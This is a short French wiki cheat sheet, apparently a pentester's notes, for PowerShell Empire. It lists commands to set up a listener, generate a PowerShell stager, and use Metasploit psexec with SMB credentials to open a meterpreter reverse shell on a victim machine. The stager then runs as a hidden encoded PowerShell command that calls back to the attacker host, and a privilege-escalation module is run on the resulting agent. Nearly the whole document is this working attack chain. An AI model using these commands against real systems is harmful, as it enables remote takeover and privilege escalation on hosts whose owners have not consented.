wiKB

Wiki-based Knowledge Base

View on GitHub

empire

http://www.powershellempire.com/

Lancer un listener dans empire :

cd ~/tools/empire/
./empire
listeners
list
info
set Name oreille
set Host http://10.0.0.1:8081/
run

Générer un stager (ici une commande powershell) :

main
usestager launcher
info
set Listener oreille
generate

Lancer le stager grâce à un ps_exec dans metasploit :

sudo msfconsole
use exploit/windows/smb/psexec
set rhost <ip_victime>
set smbdomain DOMEIN
set smbuser utilisateur
set smbpass secretPassword
set payload windows/meterpreter/reverse_tcp
set lport 8082
set lhost 10.0.0.1
exploit -j -z

 dans le meterpreter de la session ouverte
execute -f powershell.exe -a '-NoP -sta -NonI -W Hidden -Enc JAB3[…]A=='

Un agent devrait être né du listener. Il est possible de lancer un module :

[+] Initial agent K1AZ333ZLYTK3TTD from <ip_victime> now active

usemodule privesc/powerup/allchecks
options
info
set Agent K1AZ333ZLYTK3TTD
run

Attention : l’affichage du résultat du module lancé ne se fait pas dans la fenêtre. Il faut aller voir ~/tools/empire/downloads/agents/K1AZ333ZLYTK3TTD/agent.log